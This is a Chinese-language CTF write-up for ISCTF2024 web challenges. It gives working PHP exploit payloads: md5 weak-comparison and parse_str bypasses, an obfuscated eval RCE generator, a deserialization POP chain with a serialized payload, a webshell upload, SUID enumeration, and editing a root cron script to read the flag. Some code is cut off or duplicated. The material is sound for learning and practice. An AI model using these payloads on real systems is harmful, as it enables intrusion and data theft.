# ISCTF2024 复现
# 25 时晓山瑞希生日会
htt 头伪造:
伪造日期:
搜索得知 25 时生日会 是在八月二十七举办,伪造日期即可得到 flag
Date: Tue, 27 Aug 2024 12:41:59 GMT |
# 小蓝鲨的冒险
<?php | |
error_reporting(0); | |
highlight_file(__FILE__); | |
$a = "isctf2024"; | |
$b = $_GET["b"]; | |
@parse_str($b); | |
echo "小蓝鲨开始闯关,你能帮助他拿到flag吗?<br>"; | |
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) { | |
$num = $_POST["num"]; | |
echo "第一关有惊无险!小蓝鲨壮着胆子接着继续往下走!<br>"; | |
if($num == 2024){ | |
die("QAQ小蓝鲨误入陷阱,不怕,再接再厉!"); | |
} | |
if(preg_match("/[a-z]/i", $num)){ | |
die("陷阱太多QAQ"); | |
} | |
if(intval($num,0) == 2024){ | |
echo "到这了难道还要放弃吗?<br>"; | |
if (isset($_GET['which'])){ | |
$which = $_GET['which']; | |
echo "小蓝鲨貌似在哪里见过这个陷阱O.o?继续加油,还差最后一步了!"; | |
switch ($which){ | |
case 0: | |
print('QAQ'); | |
case 1: | |
case 2: | |
require_once $which.'.php'; | |
echo $flag; | |
break; | |
default: | |
echo GWF_HTML::error('PHP-0817', 'Hacker NoNoNo!', false); | |
break; | |
} | |
} | |
} | |
} |
第一层:考察 md5 弱比较和 parse_[str 函数](https://so.csdn.net/so/search?q=str 函数 & spm=1001.2101.3001.7020)
0e 开头后面全为数字,弱类型比较都等于 0,用 s878926199a 绕过
parse_str 把字符串 a [0] 当成变量解析,从而赋值
第二层:num 中不能有字母,还不能等 2024,,同时还要绕过 intval 函数
使用进制转化绕过,八进制中不含字母,可以使用 0 3750 绕过
第三层:直接写个 flag 就绕过了
综上,写入以下 payload 即可绕过:
?b=a[0]=s878926199a&which=flag
num=03750
ezrce
源码如下:
<?php | |
error_reporting(0); | |
if (isset($_GET['cmd'])) { | |
$cmd = $_GET['cmd']; | |
if (preg_match("/flag|cat|ls|echo|php|bash|sh|more| |less|head|tail|[\|\&\>\<]|eval|system|exec|popen|shell_exec/i", $cmd)) { | |
die("Blocked by security filter!"); | |
} else { | |
eval($cmd); | |
} | |
} else { | |
highlight_file(__FILE__); | |
} | |
?> |
利用无数字字母 rce 之取反,即可绕过。脚本如下:
<?php | |
// 在命令行中运行 | |
/*author yu22x*/ | |
fwrite(STDOUT,'[+]your function: '); | |
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN)); | |
fwrite(STDOUT,'[+]your command: '); | |
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN)); | |
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');'; |
payload 如下:
?cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);
# 小蓝鲨的秘密
这题点开链接就是官网,能直接打官网嘛,包不能的,考虑重定向
抓一个点击链接的包即可得到 flag(这个没想到)
天命人
源码如下:
"; $yin="s214587387a"; $yang=$_GET['J']; if (md5($yin)==$yang&&md5($yin)==md5($yang)){ echo "哦?又一个不信天命之人?行了,拿了东西速速离开吧
"; system('cat /flag'); } } } class Huoyanjinjing{ public $huoyan; public $jinjing; function __get($huo) { $this->huoyan="火眼能洞察一切邪祟!
"; echo $this->huoyan->jinjing; } function __invoke() { $this->jinjing="金睛能看破世间迷惘!
"; echo $this->huoyan->jinjing; } } class Dinghaishenzhen{ public $Jindou="一个筋斗能翻十万八千里!
"; public $yun; function __toString() { $f=$this->yun; $f(); return "你真的逃出去了吗?天命人?
"; } } class Jingdouyun{ public $Qishier=72; public $bian="看俺老孙七十二变!
"; function __sleep() { echo "三更敲门,菩提老祖送我筋斗云...
"; echo new Jindouyun(); } } class Tianmingren { public $tianming; public $ren; function __destruct() { echo "迷途中的羔羊,你相信天命吗?
"; echo $this->tianming; } } $data = unserialize($_POST['Wukong']); throw new Exception('开局一根棍,装备全靠打。'); ``` 命令执行部分是个简单的 md5 绕过 0e215962017 的 MD5 值也是由 0e 开头,在 PHP 弱类型比较中相等 链子部分就正常的构造,链子如下: ``` Tianmingren->Dinghaishenzhen->Huoyanjinjing->Wuzhishan ``` 先创建 Tianmingren 对象触发 __destruct() 魔术方法 将tianming 赋值为 Dinghaishenzhen 对象触发 __toString() 魔术方法 将属性 yun 赋值为Huoyanjinjing 对象,对象被当成函数调用触发 __invoke() 魔术方法 将属性 huoyan 赋值为 Wuzhishan 对象,访问对象不存在的属性 jinjing 触发 __get() 魔术方法 ```php $payload=new Tianmingren(); $payload->tianming=new Dinghaishenzhen(); $payload->tianming->yun = new Huoyanjinjing(); $payload->tianming->yun->huoyan=new Wuzhishan(); ``` 然后需要绕过 throw new Exception,反序列化后直接触发抛出异常导致程序不能正常往下走 然后需要绕过 throw new Exception,反序列化后直接触发抛出异常导致程序不能正常往下走 使用数组进行绕过 ``` $exp = array($payload,0); echo (serialize($exp)); // a:2:{i:0;O:11:"Tianmingren":2:{s:8:"tianming";O:15:"Dinghaishenzhen":2:{s:6:"Jindou";s:40:"一个筋斗能翻十万八千里!
";s:3:"yun";O:13:"Huoyanjinjing":2:{s:6:"huoyan";O:9:"Wuzhishan":3:{s:2:"wu";s:40:"俺老孙定要踏破这五指山!
";s:3:"zhi";N;s:4:"shan";N;}s:7:"jinjing";N;}}s:3:"ren";N;}i:1;i:0;} ``` 将输出 payload 的第二个值索引置空即可绕过异常机制,强制触发__destruct() ``` a:2:{i:0;O:11:"Tianmingren":2:{s:8:"tianming";O:15:"Dinghaishenzhen":2:{s:6:"Jindou";s:40:"一个筋斗能翻十万八千里!
";s:3:"yun";O:13:"Huoyanjinjing":2:{s:6:"huoyan";O:9:"Wuzhishan":3:{s:2:"wu";s:40:"俺老孙定要踏破这五指山!
";s:3:"zhi";N;s:4:"shan";N;}s:7:"jinjing";N;}}s:3:"ren";N;}i:0;i:0;} ``` 传入 payload 即可得到 flag  ### 小蓝鲨的临时存储室 没有任何限制,php一句话密码进去,然后发现一段时间被删了,直接/flag被拒绝了,那就是suid提权 ```bash find / -perm -u=s -type f 2>/dev/null ``` 但是这个好像没用 找一下有root权限还给看修改的可执行文件 发现根目录下的/down_file.sh,进去发现就是它在删php文件,直接给它这行代码删了直接加点小料 ```php #!/bin/bash cat /flag>/111.txt; ``` 最后找到111.txt,可以打开   获取flag